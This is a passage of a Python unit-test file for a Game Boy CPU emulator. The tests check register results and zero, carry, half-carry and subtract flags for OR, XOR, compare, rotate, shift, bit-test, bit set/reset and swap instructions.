self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.set_reg8('b', 0x55)
self.cpu.or_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_reg8('b'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg8_3(self):
self.cpu.set_reg8('a', 0x00)
self.cpu.set_reg8('b', 0x00)
self.cpu.or_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_or_imm8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.rom = bytes([0x50])
self.cpu.or_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0xfa)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_imm8_2(self):
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.rom = bytes([0x00])
self.cpu.or_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_imm16addr(self):
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(0xc000, 0x55)
self.cpu.or_imm16addr()()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_imm16addr_2(self):
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.or_imm16addr()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg16addr(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(addr16, 0x55)
self.cpu.set_reg16('hl', addr16)
self.cpu.or_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg16addr_2(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.set_addr(addr16, 0x00)
self.cpu.set_reg16('hl', addr16)
self.cpu.or_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_xor_reg8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('h', 0x55)
self.cpu.xor_reg8('h')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_reg8('h'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_reg8_2(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('b', 0xaa)
self.cpu.xor_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_reg8('b'), 0xaa)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_imm8(self):
self.cpu.set_reg8('a', 0x55)
self.cpu.mmu.rom = bytes([0xaa])
self.cpu.xor_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_imm8_2(self):
self.cpu.set_reg8('a', 0x55)
self.cpu.mmu.rom = bytes([0x55])
self.cpu.xor_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_reg16addr(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(0xc000, 0x55)
self.cpu.set_reg16('hl', 0xc000)
self.cpu.xor_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_reg16addr_2(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(0xc000, 0xaa)
self.cpu.set_reg16('hl', 0xc000)
self.cpu.xor_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_cp_reg8toreg8(self):
self.cpu.set_reg8('b', 0x5d)
self.cpu.set_reg8('d', 0x4d)
self.cpu.cp_reg8toreg8('b', 'd')()
self.assertEqual(self.cpu.get_reg8('b'), 0x5d)
self.assertEqual(self.cpu.get_reg8('d'), 0x4d)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_reg8toreg8_2(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3c)
self.cpu.set_reg8('b', 0x2f)
self.cpu.cp_reg8toreg8('a', 'b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.get_reg8('b'), 0x2f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.cpu.cp_reg8toreg8('b', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.get_reg8('b'), 0x2f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_cp_reg8toreg8_3(self):
self.cpu.set_reg8('a', 0x3c)
self.cpu.set_reg8('b', 0x3c)
self.cpu.cp_reg8toreg8('a', 'b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.get_reg8('b'), 0x3c)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_regAtoregHLaddr(self):
"""Example from the Gameboy Programming Manual"""
addr16 = 0xc000
self.cpu.set_reg8('a', 0x3c)
self.cpu.mmu.set_addr(addr16, 0x40)
self.cpu.set_reg16('hl', addr16)
self.cpu.cp_regAtoregHLaddr()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.mmu.get_addr(addr16), 0x40)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_cp_regAtoregHLaddr_2(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0x3c)
self.cpu.mmu.set_addr(addr16, 0x3c)
self.cpu.set_reg16('hl', addr16)
self.cpu.cp_regAtoregHLaddr()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.mmu.get_addr(addr16), 0x3c)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_regAtoregHLaddr_3(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0x3c)
self.cpu.mmu.set_addr(addr16, 0x2c)
self.cpu.set_reg16('hl', addr16)
self.cpu.cp_regAtoregHLaddr()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.mmu.get_addr(addr16), 0x2c)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_imm8toregA(self):
# When the immediate is the same as the contents of register A, the
# zero flag is set
self.cpu.set_reg8('a', 0xfe)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xfe])
self.cpu.cp_imm8toregA()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_imm8toregA_2(self):
# When the immediate is greater than the contents of register A, the
# carry flag is set
self.cpu.set_reg8('a', 0xfe)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xff])
self.cpu.cp_imm8toregA()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_cp_imm8toregA_3(self):
# When the immediate is less than the contents of register A, the
# half-carry flag is set
self.cpu.set_reg8('a', 0xfe)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xfc])
self.cpu.cp_imm8toregA()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_rl_reg8_1(self):
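# RL rotates through the carry flag: the old carry enters bit 0 and
# bit 7 moves into the carry.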
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x95)
self.cpu.set_carry_flag()
self.cpu.rl_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x2b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rl_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.reset_carry_flag()
self.cpu.rl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rl_reg8_3(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.set_carry_flag()
self.cpu.rl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4b)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rl_reg8_4(self):
# Make sure the zero flag is set
self.cpu.set_reg8('b', 0x00)
self.cpu.reset_carry_flag()
self.cpu.rl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rl_regHLaddr_1(self):
# Make sure zero and carry flags are set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x80)
self.cpu.reset_carry_flag()
self.cpu.rl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rl_regHLaddr_2(self):
# Make sure zero and carry flags are not set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x08)
self.cpu.set_carry_flag()
self.cpu.rl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x11)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rlc_reg8_1(self):
"""Example from the Gameboy Programming Manual
correction: result should be 0x0b, not 0x0a"""
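# RLC is a circular rotate: bit 7 goes to both bit 0 and the carry flag.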
self.cpu.set_reg8('a', 0x85)
self.cpu.reset_carry_flag()
self.cpu.rlc_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x0b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rlc_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.reset_carry_flag()
self.cpu.rlc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4b)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rlc_reg8_3(self):
# Make sure the zero flag is set
self.cpu.set_reg8('b', 0x00)
self.cpu.set_zero_flag()
self.cpu.rlc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_rlc_reg8_4(self):
# Make sure the carry flag is not set
self.cpu.set_reg8('b', 0x0a)
self.cpu.set_carry_flag()
self.cpu.rlc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x14)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_rlc_regHLaddr_1(self):
# Make sure the zero flag is set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.rlc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_rlc_regHLaddr_2(self):
# Make sure the carry flag is set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x88)
self.cpu.rlc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x11)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_1(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x81)
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x40)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_3(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.set_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_4(self):
# Make sure zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.set_zero_flag()
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_rr_reg8_5(self):
# Make sure carry flag does not get set
self.cpu.set_reg8('b', 0x10)
self.cpu.set_zero_flag()
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x08)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_rr_regHLaddr_1(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.reset_carry_flag()
self.cpu.rr_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rr_regHLaddr_2(self):
# Make sure carry flag does not get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.reset_carry_flag()
self.cpu.rr_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x08)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rrc_reg8_1(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3b)
self.cpu.reset_carry_flag()
self.cpu.rrc_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x9d)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rrc_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.rrc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rrc_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x00)
self.cpu.set_carry_flag()
self.cpu.rrc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rrc_regHLaddr(self):
# Make sure the zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.rrc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rrc_regHLaddr_2(self):
# Make sure the carry flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.rrc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x80)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_sla_reg8_1(self):
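# SLA shifts left: bit 7 goes to the carry flag and a zero enters bit 0.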
self.cpu.set_reg8('b', 0xa5)
self.cpu.sla_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sla_reg8_2(self):
self.cpu.set_reg8('b', 0x25)
self.cpu.sla_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sla_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x80)
self.cpu.sla_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_sla_regHLaddr_1(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0xa5)
self.cpu.set_reg16('hl', addr)
self.cpu.sla_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sla_regHLaddr_2(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0x25)
self.cpu.set_reg16('hl', addr)
self.cpu.sla_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sla_regHLaddr_3(self):
# Make sure the zero flag gets set
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0x80)
self.cpu.set_reg16('hl', addr)
self.cpu.sla_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_sra_reg8_1(self):
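# SRA shifts right arithmetically: bit 7 is preserved and bit 0 goes to
# the carry flag.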
self.cpu.set_reg8('b', 0xa5)
self.cpu.sra_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sra_reg8_2(self):
self.cpu.set_reg8('b', 0xa4)
self.cpu.sra_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sra_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.sra_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_sra_addr16_1(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0xa5)
self.cpu.set_reg16('hl', addr)
self.cpu.sra_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sra_addr16_2(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0xa4)
self.cpu.set_reg16('hl', addr)
self.cpu.sra_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sra_addr16_3(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0x01)
self.cpu.set_reg16('hl', addr)
self.cpu.sra_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_srl_reg8_1(self):
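# SRL shifts right logically: a zero enters bit 7 and bit 0 goes to the
# carry flag.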
self.cpu.set_reg8('b', 0xa5)
self.cpu.srl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_srl_reg8_2(self):
self.cpu.set_reg8('b', 0xa4)
self.cpu.srl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_srl_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.srl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_srl_regHLaddr_1(self):
addr = 0xc000
self.cpu.set_reg16('hl', addr)
self.cpu.mmu.set_addr(addr, 0xa5)
self.cpu.srl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_srl_regHLaddr_2(self):
addr = 0xc000
self.cpu.set_reg16('hl', addr)
self.cpu.mmu.set_addr(addr, 0xa4)
self.cpu.srl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_srl_regHLaddr_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.srl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_bit_reg8_1(self):
# Make sure zero flag does not get set
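# BIT sets the zero flag to the complement of the tested bit and always
# sets the half-carry flag.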
self.cpu.set_reg8('c', 0x10)
self.cpu.set_zero_flag()
self.cpu.bit_reg8(4, 'c')()
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_bit_reg8_2(self):
# Make sure zero flag gets set
self.cpu.set_reg8('c', 0x10)
self.cpu.reset_zero_flag()
self.cpu.bit_reg8(5, 'c')()
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_bit_regHLaddr_1(self):
# Make sure zero flag does not get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.set_zero_flag()
self.cpu.bit_regHLaddr(4)()
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_bit_regHLaddr_2(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.reset_zero_flag()
self.cpu.bit_regHLaddr(5)()
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_res_reg8_1(self):
self.cpu.set_reg8('d', 0x10)
self.cpu.res_reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x00)
def test_res_reg8_2(self):
self.cpu.set_reg8('d', 0x00)
self.cpu.res_reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x00)
def test_res_regHLaddr(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.res_regHLaddr(4)()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
def test_set__reg8_1(self):
self.cpu.set_reg8('d', 0x00)
self.cpu.set__reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x10)
def test_set__reg8_2(self):
self.cpu.set_reg8('d', 0x10)
self.cpu.set__reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x10)
def test_set_regHLaddr(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.set_regHLaddr(4)()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x10)
def test_swap_reg8_1(self):
# Make sure the zero flag does not get set
self.cpu.set_reg8('c', 0xb4)
self.cpu.set_zero_flag()
self.cpu.swap_reg8('c')()
self.assertEqual(self.cpu.get_reg8('c'), 0x4b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_swap_reg8_2(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('c', 0x00)
self.cpu.reset_zero_flag()
self.cpu.swap_reg8('c')()
self.assertEqual(self.cpu.get_reg8('c'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_swap_regHLaddr_1(self):
